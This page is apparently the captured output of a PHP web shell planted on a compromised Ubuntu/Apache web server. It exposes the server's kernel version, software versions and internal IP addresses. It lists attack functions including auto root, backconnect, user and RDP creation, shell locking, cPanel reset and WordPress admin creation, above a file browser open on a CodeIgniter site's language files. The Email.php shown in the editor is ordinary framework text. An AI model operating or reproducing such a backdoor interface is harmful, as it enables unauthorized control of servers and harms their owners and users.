Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
system /
language /
en /
[ HOME SHELL ]
Name
Size
Permission
Action
CLI.php
1.9
KB
-rwxr-x--x
Cache.php
605
B
-rwxr-x--x
Cast.php
1005
B
-rwxr-x--x
Cookie.php
1.34
KB
-rwxr-x--x
Core.php
968
B
-rwxr-x--x
Database.php
1.65
KB
-rwxr-x--x
Email.php
1.9
KB
-rwxr-x--x
Encryption.php
709
B
-rwxr-x--x
Fabricator.php
501
B
-rwxr-x--x
Files.php
399
B
-rwxr-x--x
Filters.php
458
B
-rwxr-x--x
Format.php
583
B
-rwxr-x--x
HTTP.php
3.43
KB
-rwxr-x--x
Images.php
2.24
KB
-rwxr-x--x
Log.php
427
B
-rwxr-x--x
Migrations.php
2.5
KB
-rwxr-x--x
Number.php
656
B
-rwxr-x--x
Pager.php
731
B
-rwxr-x--x
RESTful.php
350
B
-rwxr-x--x
Router.php
508
B
-rwxr-x--x
Security.php
488
B
-rwxr-x--x
Session.php
939
B
-rwxr-x--x
Time.php
1.39
KB
-rwxr-x--x
Validation.php
4.59
KB
-rwxr-x--x
View.php
716
B
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Email.php
<?php /** * This file is part of CodeIgniter 4 framework. * * (c) CodeIgniter Foundation <admin@codeigniter.com> * * For the full copyright and license information, please view * the LICENSE file that was distributed with this source code. */ // Email language settings return [ 'mustBeArray' => 'The email validation method must be passed an array.', 'invalidAddress' => 'Invalid email address: {0}', 'attachmentMissing' => 'Unable to locate the following email attachment: {0}', 'attachmentUnreadable' => 'Unable to open this attachment: {0}', 'noFrom' => 'Cannot send mail with no "From" header.', 'noRecipients' => 'You must include recipients: To, Cc, or Bcc', 'sendFailurePHPMail' => 'Unable to send email using PHP mail(). Your server might not be configured to send mail using this method.', 'sendFailureSendmail' => 'Unable to send email using PHP Sendmail. Your server might not be configured to send mail using this method.', 'sendFailureSmtp' => 'Unable to send email using PHP SMTP. Your server might not be configured to send mail using this method.', 'sent' => 'Your message has been successfully sent using the following protocol: {0}', 'noSocket' => 'Unable to open a socket to Sendmail. Please check settings.', 'noHostname' => 'You did not specify a SMTP hostname.', 'SMTPError' => 'The following SMTP error was encountered: {0}', 'noSMTPAuth' => 'Error: You must assign a SMTP username and password.', 'failedSMTPLogin' => 'Failed to send AUTH LOGIN command. Error: {0}', 'SMTPAuthUsername' => 'Failed to authenticate username. Error: {0}', 'SMTPAuthPassword' => 'Failed to authenticate password. Error: {0}', 'SMTPDataFailure' => 'Unable to send data: {0}', 'exitStatus' => 'Exit status code: {0}', ];
Close